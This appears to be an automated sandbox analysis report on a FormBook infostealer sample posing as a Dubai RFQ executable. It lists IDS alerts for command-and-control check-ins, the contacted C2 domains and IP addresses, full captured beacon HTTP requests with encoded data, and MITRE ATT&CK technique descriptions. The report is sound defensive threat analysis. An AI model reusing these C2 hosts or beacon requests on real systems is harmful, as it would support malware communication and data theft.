Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49854 -> 172.67.220.57:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49878 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49864 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49869 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49879 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49872 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49881 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49889 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49865 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49868 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49886 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49870 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49875 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49899 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49880 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49901 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49905 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49897 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49910 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49898 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49900 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49902 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49903 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49890 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49861 -> 76.223.54.146:80

Source: Joe Sandbox View	IP Address: 15.197.148.33 15.197.148.33
Source: Joe Sandbox View	IP Address: 65.21.196.90 65.21.196.90

Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Virustotal: Detection: 63%			Perma Link
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	ReversingLabs: Detection: 63%

Source:	DNS query: www.academyinmotion.xyz
Source:	DNS query: www.030002252.xyz
Source:	DNS query: www.60881.xyz
Source:	DNS query: www.60881.xyz
Source:	DNS query: www.ly0.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Source: global traffic	HTTP traffic detected: GET /63ck/?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s= HTTP/1.1Host: www.academyinmotion.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /o7wc/?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /53bw/?ATk=y602DfOxy8k4aDGeL2LafnkTvLx8g5VEvf5zKPNxBw/5ZQtnSgrsDIOhG/LT94BV3SRTeLh29bGmgRGfpvfkXpkrxRE8C/BpnF37AgHX90StwlvjASc62/Y=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.awesomearv.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /2ncs/?ATk=C9x4nV75ALRtqPK+aBsvNSORqAmxpUqabxnIo4b2Z27N+E0QPuJF7pc8iv4PlagxECtfepEWwKhTDmrEQ68cgQIoGVeGGvf3Nn6d9y2yCfOYMDMeHUtLkc0=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.030002252.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /r61b/?ATk=3quBh4mzL0lL+B9uaB4+B/ehh8Vuymt6GENoLoKygJVSWFdT0X7NdoMT/6uiE3Ni1BD7Zx2rh99upTwYdPvuPJZKDP4PvDgre2/rGfgIw+gfAM2DFPuj10Q=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.mjcregionsud.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /kbee/?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.levelsabovetravel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9m01/?ATk=YTEnPXeuvLCqp8pRYpXUCZpIg36YHpIu3aiFszfHZiHCethv0UoX0rLDgO0m0L5Zay3qgh7+EeCD2cfEa0kxUJqZj+V+1gWSSyE2BB2v0BjXvCGVFHNVoHA=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.d81dp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /q7ah/?ATk=yQb1MnoYePGa+D7HYXNMgCWfQwyPM5qgSNNB5eb+vdtsin1jnkdmik2CDVoWxFHrVuMckJ02SL88S12T7EptqLmfnh4CTyoL2s7wDlIiRZZ8USqQIrqm93w=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.numbox.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /vshw/?ATk=EspU2mytRZKz4auAzU3Q1p3hOp6U+fvbelDltaue1VIW4sYIVCILykrSg5ScN2hRjv7eCPLeVYxJkFe87LUrJKeKTtCcyXc83om833z/vTsR6D13pLQ0NOo=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.ly0.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /kgyd/?ATk=Wu3HLPqvQhberYZQa3Sb+njlvaNnBpLcCB7xsP8R/99k0A4wkukwLWIZ+Z7OJCWhofveZifw88127MBJWT7MTleP4HHJ+1MXSr+cpLCtjuYkBkW6/d1uK4M=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.myrideguy.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /qwed/?ATk=3xPBQa2W6ZGmKQ9eZ5r3c7KKL9obtlSyxcTE+lTJMU/LzzcDJGN7AbsmZfmE7bRgUl3cSaaIlgRs7XOqQeV12RmBNfjH2o5P43HloysUpPdnpFuq8MUfY+k=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.lunch.deliveryAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /te6q/?VDohI=5PBL_pQpTf5haV&ATk=Bi48EnnHLnucFoFteYAZbM12VO+YpqUowmdcea1K+IX7Dd8zgRCPoE2+V26bo8zYK23oBEB5tVQZMZR237sZLVeieLGkB+ILMPGhp+qwj0taeKVYBLshWkk= HTTP/1.1Host: www.allinathletes.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /el3s/?ATk=6Ta3dC1SbFexLGaAyLCMrvtEQp7UC9YLWm/0OzXEbXNGBqYW7sBnSGUWAqT2FNWebLiZ+YaCaloaRZMkiWHL7MfZ4P+RlEyvopkHNBDi+G5Q1FNXiRoH7Ec=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.barbequecritics.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /hv5a/?ATk=Q5HVSLioRpHXZuVJMziOfiuU0onjCcEbGsrAfvZObs+1KXx/rQhduJNWJTpzG+WdwhfwBTLLmLhvS41bu9oAO2bNxYC9M61ukvJIhxXLVlHkTxp4qBAlfQs=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.wineservicesgroup.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9bnb/?ATk=XgXvlhFLn0yasIzwV8HNefiGaWxYWjFs+Vu5QhEKO2I7xekKRpo59pX70vTgc6tofct2g55bDtxMjf3b70N1jPElytkl9t3yc3m2himnW0R7Cxc4fJK3SCo=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.1clickw2.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /63ck/?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s= HTTP/1.1Host: www.academyinmotion.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /o7wc/?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /53bw/?ATk=y602DfOxy8k4aDGeL2LafnkTvLx8g5VEvf5zKPNxBw/5ZQtnSgrsDIOhG/LT94BV3SRTeLh29bGmgRGfpvfkXpkrxRE8C/BpnF37AgHX90StwlvjASc62/Y=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.awesomearv.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /2ncs/?ATk=C9x4nV75ALRtqPK+aBsvNSORqAmxpUqabxnIo4b2Z27N+E0QPuJF7pc8iv4PlagxECtfepEWwKhTDmrEQ68cgQIoGVeGGvf3Nn6d9y2yCfOYMDMeHUtLkc0=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.030002252.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /r61b/?ATk=3quBh4mzL0lL+B9uaB4+B/ehh8Vuymt6GENoLoKygJVSWFdT0X7NdoMT/6uiE3Ni1BD7Zx2rh99upTwYdPvuPJZKDP4PvDgre2/rGfgIw+gfAM2DFPuj10Q=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.mjcregionsud.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /kbee/?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.levelsabovetravel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /9m01/?ATk=YTEnPXeuvLCqp8pRYpXUCZpIg36YHpIu3aiFszfHZiHCethv0UoX0rLDgO0m0L5Zay3qgh7+EeCD2cfEa0kxUJqZj+V+1gWSSyE2BB2v0BjXvCGVFHNVoHA=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.d81dp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /q7ah/?ATk=yQb1MnoYePGa+D7HYXNMgCWfQwyPM5qgSNNB5eb+vdtsin1jnkdmik2CDVoWxFHrVuMckJ02SL88S12T7EptqLmfnh4CTyoL2s7wDlIiRZZ8USqQIrqm93w=&VDohI=5PBL_pQpTf5haV HTTP/1.1Host: www.numbox.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: www.academyinmotion.xyz
Source: global traffic	DNS traffic detected: DNS query: www.heeraka.info
Source: global traffic	DNS traffic detected: DNS query: www.awesomearv.buzz
Source: global traffic	DNS traffic detected: DNS query: www.030002252.xyz
Source: global traffic	DNS traffic detected: DNS query: www.60881.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mjcregionsud.org
Source: global traffic	DNS traffic detected: DNS query: www.levelsabovetravel.info
Source: global traffic	DNS traffic detected: DNS query: www.d81dp.top
Source: global traffic	DNS traffic detected: DNS query: www.numbox.live
Source: global traffic	DNS traffic detected: DNS query: www.ly0.xyz
Source: global traffic	DNS traffic detected: DNS query: www.myrideguy.net
Source: global traffic	DNS traffic detected: DNS query: www.lunch.delivery
Source: global traffic	DNS traffic detected: DNS query: www.allinathletes.biz
Source: global traffic	DNS traffic detected: DNS query: www.barbequecritics.com
Source: global traffic	DNS traffic detected: DNS query: www.wineservicesgroup.net
Source: global traffic	DNS traffic detected: DNS query: www.1clickw2.net

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
